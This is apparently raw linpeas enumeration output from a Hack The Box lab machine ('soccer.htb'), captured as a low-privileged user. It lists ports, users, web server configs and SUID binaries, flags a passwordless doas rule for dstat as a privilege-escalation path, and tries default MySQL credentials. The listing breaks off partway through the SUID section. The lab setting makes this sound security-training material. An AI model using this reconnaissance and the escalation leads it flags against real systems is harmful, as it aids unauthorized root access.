-org.freedesktop.Accounts - - - - - - -org.freedesktop.DBus - - - - - - -org.freedesktop.ModemManager1 - - - - - - -org.freedesktop.PackageKit - - - (activatable) - - -org.freedesktop.PolicyKit1 - - - - - - -org.freedesktop.UDisks2 - - - - - - -org.freedesktop.bolt - - - (activatable) - - -org.freedesktop.fwupd - - - - - - -org.freedesktop.hostname1 - - - (activatable) - - -org.freedesktop.locale1 - - - (activatable) - - -org.freedesktop.login1 - - - - - - -org.freedesktop.network1 - - - - - - -org.freedesktop.resolve1 - - - - - - -org.freedesktop.systemd1 - - - - - - -org.freedesktop.timedate1 - - - (activatable) - - -org.freedesktop.timesync1 - - - (activatable) - - - ╔═════════════════════╗══════════════════════════════╣ Network Information ╠══════════════════════════════ ╚═════════════════════╝ ╔══════════╣ Hostname, hosts and DNSsoccer 127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb127.0.1.1 ubuntu-focal ubuntu-focalnameserver 127.0.0.53options edns0 trust-ad╔══════════╣ Interfaces# symbolic names for networks, see networks(5) for more information link-local 169.254.0.0eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.11.194 netmask 255.255.254.0 broadcast 10.10.11.255 inet6 dead:beef::250:56ff:feb9:b17b prefixlen 64 scopeid 0x0<global> inet6 fe80::250:56ff:feb9:b17b prefixlen 64 scopeid 0x20<link> ether 00:50:56:b9:b1:7b txqueuelen 1000 (Ethernet) RX packets 229490 bytes 33975517 (33.9 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 241272 bytes 72136368 (72.1 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 102027 bytes 23742553 (23.7 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 102027 bytes 23742553 (23.7 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0╔══════════╣ Active Ports╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports tcp 0 0 0.0.0.0:9091 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - ╔══════════╣ Can I sniff with tcpdump?No ╔═══════════════════╗═══════════════════════════════╣ Users Information ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=1001(player) gid=1001(player) groups=1001(player) ╔══════════╣ Do I have PGP keys?/usr/bin/gpg netpgpkeys Not Foundnetpgp Not Found╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid Sorry, try again. ╔══════════╣ Checking sudo tokens╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (1) gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it╔══════════╣ Checking doas.confpermit nopass player as root cmd /usr/bin/dstat ╔══════════╣ Checking Pkexec policy╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2 [Configuration]AdminIdentities=unix-user:0[Configuration]AdminIdentities=unix-group:sudo;unix-group:admin╔══════════╣ Superusersroot:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with consoleplayer:x:1001:1001::/home/player:/bin/bash root:x:0:0:root:/root:/bin/bash╔══════════╣ All users & groupsuid=0(root) gid=0(root) groups=0(root) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)uid=10(uucp) gid=10(uucp) groups=10(uucp)uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)uid=1001(player) gid=1001(player) groups=1001(player)uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)uid=106(tss) gid=111(tss) groups=111(tss)uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)uid=110(landscape) gid=115(landscape) groups=115(landscape)uid=111(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)uid=112(fwupd-refresh) gid=116(fwupd-refresh) groups=116(fwupd-refresh)uid=113(mysql) gid=121(mysql) groups=121(mysql)uid=13(proxy) gid=13(proxy) groups=13(proxy)uid=2(bin) gid=2(bin) groups=2(bin)uid=3(sys) gid=3(sys) groups=3(sys)uid=33(www-data) gid=33(www-data) groups=33(www-data)uid=34(backup) gid=34(backup) groups=34(backup)uid=38(list) gid=38(list) groups=38(list)uid=39(irc) gid=39(irc) groups=39(irc)uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)uid=41(gnats) gid=41(gnats) groups=41(gnats)uid=5(games) gid=60(games) groups=60(games)uid=6(man) gid=12(man) groups=12(man)uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)uid=7(lp) gid=7(lp) groups=7(lp)uid=8(mail) gid=8(mail) groups=8(mail)uid=9(news) gid=9(news) groups=9(news)uid=997(_laurel) gid=997(_laurel) groups=997(_laurel)uid=998(lxd) gid=100(users) groups=100(users)uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)╔══════════╣ Login now 07:08:33 up 20:03, 2 users, load average: 0.14, 0.04, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT╔══════════╣ Last logonsroot tty1 Fri Dec 2 10:53:47 2022 - down (00:01) 0.0.0.0 reboot system boot Fri Dec 2 10:53:14 2022 - Fri Dec 2 10:54:54 2022 (00:01) 0.0.0.0root tty1 Fri Dec 2 10:50:00 2022 - down (00:03) 0.0.0.0reboot system boot Fri Dec 2 10:48:18 2022 - Fri Dec 2 10:53:08 2022 (00:04) 0.0.0.0player pts/0 Fri Dec 2 09:16:09 2022 - Fri Dec 2 09:18:16 2022 (00:02) 10.10.14.40reboot system boot Fri Dec 2 09:14:12 2022 - Fri Dec 2 09:18:19 2022 (00:04) 0.0.0.0player pts/0 Thu Dec 1 19:01:52 2022 - Thu Dec 1 19:09:17 2022 (00:07) 10.10.14.40reboot system boot Thu Dec 1 19:01:06 2022 - Thu Dec 1 19:09:20 2022 (00:08) 0.0.0.0wtmp begins Thu Dec 1 19:01:06 2022╔══════════╣ Last time logon each userUsername Port From Latest root tty1 Fri Dec 2 10:53:47 +0000 2022player pts/2 10.10.16.6 Sun Mar 19 07:03:42 +0000 2023╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...) ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!! ╔══════════════════════╗═════════════════════════════╣ Software Information ╠═════════════════════════════ ╚══════════════════════╝ ╔══════════╣ Useful software/usr/bin/base64 /usr/bin/curl/usr/local/bin/doas/usr/bin/g++/usr/bin/gcc/snap/bin/lxc/usr/bin/make/usr/bin/nc/usr/bin/netcat/usr/bin/perl/usr/bin/php/usr/bin/ping/usr/bin/python3/usr/bin/sudo/usr/bin/wget╔══════════╣ Installed Compilersii g++ 4:9.3.0-1ubuntu2 amd64 GNU C++ compiler ii g++-9 9.4.0-1ubuntu1~20.04.1 amd64 GNU C++ compilerii gcc 4:9.3.0-1ubuntu2 amd64 GNU C compilerii gcc-9 9.4.0-1ubuntu1~20.04.1 amd64 GNU C compiler/usr/bin/gcc╔══════════╣ MySQL versionmysql Ver 8.0.31-0ubuntu0.20.04.2 for Linux on x86_64 ((Ubuntu)) ═╣ MySQL connection using default root/root ........... No═╣ MySQL connection using root/toor ................... No ═╣ MySQL connection using root/NOPASS ................. No ╔══════════╣ Searching mysql credentials and execFrom '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql Found readable /etc/mysql/my.cnf!includedir /etc/mysql/conf.d/!includedir /etc/mysql/mysql.conf.d/╔══════════╣ Analyzing MariaDB Files (limit 70) -rw------- 1 root root 317 Dec 1 18:13 /etc/mysql/debian.cnf╔══════════╣ Analyzing Apache-Nginx Files (limit 70)Apache version: Server version: Apache/2.4.41 (Ubuntu) Server built: 2022-06-14T13:30:55httpd Not Found Nginx version: /etc/apache2/mods-available/php7.4.conf-/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php--/etc/apache2/mods-available/php7.4.conf-/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source══╣ Nginx modulesngx_http_image_filter_module.so ngx_http_xslt_filter_module.songx_mail_module.songx_stream_module.so══╣ PHP exec extensionsdrwxr-xr-x 2 root root 4096 Dec 1 13:48 /etc/nginx/sites-enabled drwxr-xr-x 2 root root 4096 Dec 1 13:48 /etc/nginx/sites-enabledlrwxrwxrwx 1 root root 41 Nov 17 08:39 /etc/nginx/sites-enabled/soc-player.htb -> /etc/nginx/sites-available/soc-player.htbserver { listen 80; listen [::]:80; server_name soc-player.soccer.htb; root /root/app/views; location / { proxy_pass http://localhost:3000; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection ' upgrade'; proxy_set_header Host $host; proxy_cache_bypass $http_upgrade; }}lrwxrwxrwx 1 root root 34 Nov 17 08:06 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/defaultserver { listen 80; listen [::]:80; server_name 0.0.0.0; return 301 http://soccer.htb$request_uri;}server { listen 80; listen [::]:80; server_name soccer.htb; root /var/www/html; index index.html tinyfilemanager.php; location / { try_files $uri $uri/ =404; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.4-fpm.sock; } location ~ /\.ht { deny all; }}-rw-r--r-- 1 root root 72941 Nov 2 09:53 /etc/php/7.4/apache2/php.iniallow_url_fopen = Onallow_url_include = Offodbc.allow_persistent = Onmysqli.allow_persistent = Onpgsql.allow_persistent = On-rw-r--r-- 1 root root 72539 Nov 2 09:53 /etc/php/7.4/cli/php.iniallow_url_fopen = Onallow_url_include = Offodbc.allow_persistent = Onmysqli.allow_persistent = Onpgsql.allow_persistent = On-rw-r--r-- 1 root root 72941 Nov 2 09:53 /etc/php/7.4/fpm/php.iniallow_url_fopen = Onallow_url_include = Offodbc.allow_persistent = Onmysqli.allow_persistent = Onpgsql.allow_persistent = On-rw-r--r-- 1 root root 1490 Feb 4 2019 /etc/nginx/nginx.confuser www-data;worker_processes auto;pid /run/nginx.pid;include /etc/nginx/modules-enabled/*.conf;events { worker_connections 768;}http { sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; include /etc/nginx/mime.types; default_type application/octet-stream; ssl_prefer_server_ciphers on; access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; gzip on; include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*;}-rw-r--r-- 1 root root 389 Feb 4 2019 /etc/default/nginx-rwxr-xr-x 1 root root 4579 Feb 4 2019 /etc/init.d/nginx-rw-r--r-- 1 root root 329 Feb 4 2019 /etc/logrotate.d/nginxdrwxr-xr-x 8 root root 4096 Nov 17 08:06 /etc/nginxlrwxrwxrwx 1 root root 48 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-mail.conf -> /usr/share/nginx/modules-available/mod-mail.confload_module modules/ngx_mail_module.so;lrwxrwxrwx 1 root root 61 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-http-image-filter.conf -> /usr/share/nginx/modules-available/mod-http-image-filter.confload_module modules/ngx_http_image_filter_module.so;lrwxrwxrwx 1 root root 50 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-stream.conf -> /usr/share/nginx/modules-available/mod-stream.confload_module modules/ngx_stream_module.so;lrwxrwxrwx 1 root root 60 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf -> /usr/share/nginx/modules-available/mod-http-xslt-filter.confload_module modules/ngx_http_xslt_filter_module.so;-rw-r--r-- 1 root root 423 Feb 4 2019 /etc/nginx/snippets/fastcgi-php.conffastcgi_split_path_info ^(.+?\.php)(/.*)$;try_files $fastcgi_script_name =404;set $path_info $fastcgi_path_info;fastcgi_param PATH_INFO $path_info;fastcgi_index index.php;include fastcgi.conf;-rw-r--r-- 1 root root 217 Feb 4 2019 /etc/nginx/snippets/snakeoil.confssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;-rw-r--r-- 1 root root 1490 Feb 4 2019 /etc/nginx/nginx.confuser www-data;worker_processes auto;pid /run/nginx.pid;include /etc/nginx/modules-enabled/*.conf;events { worker_connections 768;}http { sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; include /etc/nginx/mime.types; default_type application/octet-stream; ssl_prefer_server_ciphers on; access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; gzip on; include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*;}-rw-r--r-- 1 root root 1077 Feb 4 2019 /etc/nginx/fastcgi.conffastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_param QUERY_STRING $query_string;fastcgi_param REQUEST_METHOD $request_method;fastcgi_param CONTENT_TYPE $content_type;fastcgi_param CONTENT_LENGTH $content_length;fastcgi_param SCRIPT_NAME $fastcgi_script_name;fastcgi_param REQUEST_URI $request_uri;fastcgi_param DOCUMENT_URI $document_uri;fastcgi_param DOCUMENT_ROOT $document_root;fastcgi_param SERVER_PROTOCOL $server_protocol;fastcgi_param REQUEST_SCHEME $scheme;fastcgi_param HTTPS $https if_not_empty;fastcgi_param GATEWAY_INTERFACE CGI/1.1;fastcgi_param SERVER_SOFTWARE nginx/$nginx_version;fastcgi_param REMOTE_ADDR $remote_addr;fastcgi_param REMOTE_PORT $remote_port;fastcgi_param SERVER_ADDR $server_addr;fastcgi_param SERVER_PORT $server_port;fastcgi_param SERVER_NAME $server_name;fastcgi_param REDIRECT_STATUS 200;-rw-r--r-- 1 root root 374 Feb 4 2019 /etc/ufw/applications.d/nginxdrwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/nginx-rwxr-xr-x 1 root root 1195152 Nov 10 06:38 /usr/sbin/nginxdrwxr-xr-x 2 root root 4096 Nov 17 08:06 /usr/share/doc/nginxdrwxr-xr-x 4 root root 4096 Nov 17 08:06 /usr/share/nginx-rw-r--r-- 1 root root 53 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-image-filter.confload_module modules/ngx_http_image_filter_module.so;-rw-r--r-- 1 root root 52 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-xslt-filter.confload_module modules/ngx_http_xslt_filter_module.so;-rw-r--r-- 1 root root 42 Nov 10 06:38 /usr/share/nginx/modules-available/mod-stream.confload_module modules/ngx_stream_module.so;-rw-r--r-- 1 root root 40 Nov 10 06:38 /usr/share/nginx/modules-available/mod-mail.confload_module modules/ngx_mail_module.so;drwxr-xr-x 7 root root 4096 Nov 17 08:06 /var/lib/nginxfind: ‘/var/lib/nginx/proxy’: Permission deniedfind: ‘/var/lib/nginx/scgi’: Permission deniedfind: ‘/var/lib/nginx/fastcgi’: Permission deniedfind: ‘/var/lib/nginx/uwsgi’: Permission deniedfind: ‘/var/lib/nginx/body’: Permission denieddrwxr-xr-x 2 root adm 4096 Mar 19 00:00 /var/log/nginx╔══════════╣ Analyzing FastCGI Files (limit 70)-rw-r--r-- 1 root root 1007 Feb 4 2019 /etc/nginx/fastcgi_params ╔══════════╣ Analyzing Rsync Files (limit 70)-rw-r--r-- 1 root root 1044 Aug 16 2022 /usr/share/doc/rsync/examples/rsyncd.conf [ftp] comment = public archive path = /var/www/pub use chroot = yes lock file = /var/lock/rsyncd read only = yes list = yes uid = nobody gid = nogroup strict modes = yes ignore errors = no ignore nonreadable = yes transfer logging = no timeout = 600 refuse options = checksum dry-run dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz╔══════════╣ Analyzing Ldap Files (limit 70)The password hash is from the {SSHA} to 'structural' drwxr-xr-x 2 root root 4096 Nov 15 21:40 /etc/ldap╔══════════╣ Searching ssl/ssh filesPasswordAuthentication yes ChallengeResponseAuthentication noUsePAM yes══╣ Some certificates were found (out limited):/etc/pki/fwupd-metadata/LVFS-CA.pem /etc/pki/fwupd/LVFS-CA.pem/etc/pollinate/entropy.ubuntu.com.pem/snap/core20/1695/etc/ssl/certs/ACCVRAIZ1.pem/snap/core20/1695/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem/snap/core20/1695/etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem/snap/core20/1695/etc/ssl/certs/ANF_Secure_Server_Root_CA.pem/snap/core20/1695/etc/ssl/certs/Actalis_Authentication_Root_CA.pem/snap/core20/1695/etc/ssl/certs/AffirmTrust_Commercial.pem/snap/core20/1695/etc/ssl/certs/AffirmTrust_Networking.pem/snap/core20/1695/etc/ssl/certs/AffirmTrust_Premium.pem/snap/core20/1695/etc/ssl/certs/AffirmTrust_Premium_ECC.pem/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_1.pem/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_2.pem/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_3.pem/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_4.pem/snap/core20/1695/etc/ssl/certs/Atos_TrustedRoot_2011.pem/snap/core20/1695/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem/snap/core20/1695/etc/ssl/certs/Baltimore_CyberTrust_Root.pem/snap/core20/1695/etc/ssl/certs/Buypass_Class_2_Root_CA.pem308505PSTORAGE_CERTSBIN══╣ Writable ssh and gpg agents/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket /etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket/etc/systemd/user/sockets.target.wants/gpg-agent.socket/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket══╣ Some home ssh config file was found/usr/share/openssh/sshd_config Include /etc/ssh/sshd_config.d/*.confChallengeResponseAuthentication noUsePAM yesX11Forwarding yesPrintMotd noAcceptEnv LANG LC_*Subsystem sftp /usr/lib/openssh/sftp-server══╣ /etc/hosts.allow file found, trying to read the rules:/etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting infoInclude /etc/ssh/ssh_config.d/*.confHost * SendEnv LANG LC_* HashKnownHosts yes GSSAPIAuthentication yes╔══════════╣ Analyzing PAM Auth Files (limit 70)drwxr-xr-x 2 root root 4096 Dec 1 18:14 /etc/pam.d -rw-r--r-- 1 root root 2133 Mar 30 2022 /etc/pam.d/sshd╔══════════╣ Searching tmux sessions╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions tmux 3.0a /tmp/tmux-1001╔══════════╣ Analyzing Cloud Init Files (limit 70)-rw-r--r-- 1 root root 3787 Oct 3 16:57 /snap/core20/1695/etc/cloud/cloud.cfg lock_passwd: True╔══════════╣ Analyzing Keyring Files (limit 70)drwxr-xr-x 2 root root 200 Oct 27 15:47 /snap/core20/1695/usr/share/keyrings drwxr-xr-x 2 root root 4096 Dec 1 18:12 /usr/share/keyrings╔══════════╣ Searching uncommon passwd files (splunk)passwd file: /etc/pam.d/passwd passwd file: /etc/passwdpasswd file: /snap/core20/1695/etc/pam.d/passwdpasswd file: /snap/core20/1695/etc/passwdpasswd file: /snap/core20/1695/usr/share/bash-completion/completions/passwdpasswd file: /snap/core20/1695/usr/share/lintian/overrides/passwdpasswd file: /snap/core20/1695/var/lib/extrausers/passwdpasswd file: /usr/share/bash-completion/completions/passwdpasswd file: /usr/share/lintian/overrides/passwd╔══════════╣ Analyzing Github Files (limit 70)drwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/node_modules/npm/node_modules/node-gyp/.github drwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/node_modules/npm/node_modules/node-gyp/gyp/.githubdrwxr-xr-x 3 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/ast-types/.githubdrwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/balanced-match/.githubdrwxr-xr-x 3 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/proxy-agent/.githubdrwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.githubdrwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.githubdrwxr-xr-x 8 www-data www-data 4096 Mar 18 11:42 /tmp/CVE-2022-0185/.git╔══════════╣ Analyzing PGP-GPG Files (limit 70)/usr/bin/gpg netpgpkeys Not Foundnetpgp Not Found-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg-rw------- 1 player player 1200 Mar 19 03:58 /home/player/.gnupg/trustdb.gpg-rw-r--r-- 1 root root 7399 Sep 17 2018 /snap/core20/1695/usr/share/keyrings/ubuntu-archive-keyring.gpg-rw-r--r-- 1 root root 6713 Oct 27 2016 /snap/core20/1695/usr/share/keyrings/ubuntu-archive-removed-keys.gpg-rw-r--r-- 1 root root 4097 Feb 6 2018 /snap/core20/1695/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg-rw-r--r-- 1 root root 0 Jan 17 2018 /snap/core20/1695/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg-rw-r--r-- 1 root root 1227 May 27 2010 /snap/core20/1695/usr/share/keyrings/ubuntu-master-keyring.gpg-rw-r--r-- 1 root root 3267 Jul 4 2022 /usr/share/gnupg/distsigkey.gpg-rw-r--r-- 1 root root 2206 Nov 17 08:06 /usr/share/keyrings/nodesource.gpg-rw-r--r-- 1 root root 2247 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg-rw-r--r-- 1 root root 2274 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cis.gpg-rw-r--r-- 1 root root 2236 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg-rw-r--r-- 1 root root 2264 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg-rw-r--r-- 1 root root 2275 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-fips.gpg-rw-r--r-- 1 root root 2250 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg-rw-r--r-- 1 root root 2235 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-ros.gpg-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg-rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpgdrwx------ 3 player player 4096 Mar 19 07:08 /home/player/.gnupg╔══════════╣ Analyzing Cache Vi Files (limit 70) lrwxrwxrwx 1 root root 9 Nov 17 09:02 /home/player/.viminfo -> /dev/null╔══════════╣ Searching docker files (limit 70)╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation -rw-r--r-- 1 root root 477 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/docker-compose.yml ╔══════════╣ Analyzing Postfix Files (limit 70)-rw-r--r-- 1 root root 813 Feb 2 2020 /snap/core20/1695/usr/share/bash-completion/completions/postfix -rw-r--r-- 1 root root 813 Feb 2 2020 /usr/share/bash-completion/completions/postfix╔══════════╣ Analyzing FTP Files (limit 70) -rw-r--r-- 1 root root 69 Nov 2 09:53 /etc/php/7.4/mods-available/ftp.ini-rw-r--r-- 1 root root 69 Nov 2 09:53 /usr/share/php7.4-common/common/ftp.ini╔══════════╣ Analyzing Bind Files (limit 70)-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind -rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind╔══════════╣ Analyzing Interesting logs Files (limit 70)-rw-r----- 1 www-data adm 8751 Mar 19 07:01 /var/log/nginx/access.log -rw-r----- 1 www-data adm 0 Mar 19 00:00 /var/log/nginx/error.log╔══════════╣ Analyzing Windows Files (limit 70) lrwxrwxrwx 1 root root 20 Nov 17 08:10 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnflrwxrwxrwx 1 root root 24 Nov 17 08:09 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf-rw-r--r-- 1 root root 81 Dec 1 18:13 /var/lib/dpkg/alternatives/my.cnf╔══════════╣ Analyzing Other Interesting Files (limit 70)-rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc -rw-r--r-- 1 player player 3771 Feb 25 2020 /home/player/.bashrc-rw-r--r-- 1 root root 3771 Feb 25 2020 /snap/core20/1695/etc/skel/.bashrc-rw------- 1 player player 36 Mar 19 05:23 /home/player/.lesshst-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile-rw-r--r-- 1 player player 807 Feb 25 2020 /home/player/.profile-rw-r--r-- 1 root root 807 Feb 25 2020 /snap/core20/1695/etc/skel/.profile ╔═══════════════════╗═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwsr-xr-x 1 root root 42K Nov 17 09:09 /usr/local/bin/doas -rwsr-xr-x 1 root root 140K Nov 28 04:55 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)-rwsr-xr-- 1 root messagebus 51K Oct 25 13:09 /usr/lib/dbus-1.0/dbus-daemon-launch-helper-rwsr-xr-x 1 root root 463K Mar 30 2022 /usr/lib/openssh/ssh-keysign-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device-rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount ---> BSD/Linux(08-1996)-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount-rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8-rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su-rwsr-xr-x 1 root root 44K Nov 29 11:53 /usr/bin/newgrp ---> HP-UX_10.20-rwsr-xr-x 1 root root 84K Nov 29 11:53 /usr/bin/chfn ---> SuSE_9.3/10-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable-rwsr-xr-x 1 root root 67K Nov 29 11:53 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)-rwsr-xr-x 1 root root 87K Nov 29 11:53 /usr/bin/gpasswd-rwsr-xr-x 1 root root 52K Nov 29 11:53 /usr/bin/chsh-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)-rwsr-xr-x 1 root root 121K Nov 25 17:29 /snap/snapd/17883/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)-rwsr-xr-x 1 root root 84K Mar 14 2022 /snap/core20/1695/usr/bin/chfn ---> SuSE_9.3/10-rwsr-xr-x 1 root root 52K Mar 14 2022 /snap/core20/1695/usr/bin/chsh-rwsr-xr-x 1 root root 87K Mar 14 2022 /snap/core20/1695/usr/bin/gpasswd-rwsr-xr-x 1 root root 55K Feb 7 2022 /snap/core20/1695/usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8-rwsr-xr-x 1 root root 44K Mar 14 2022 /snap/core20/1695/usr/bin/newgrp ---> HP-UX_10.20-rwsr-xr-x 1 root root 67K Mar 14 2022 /snap/core20/1695/usr/bin/passwd ---> 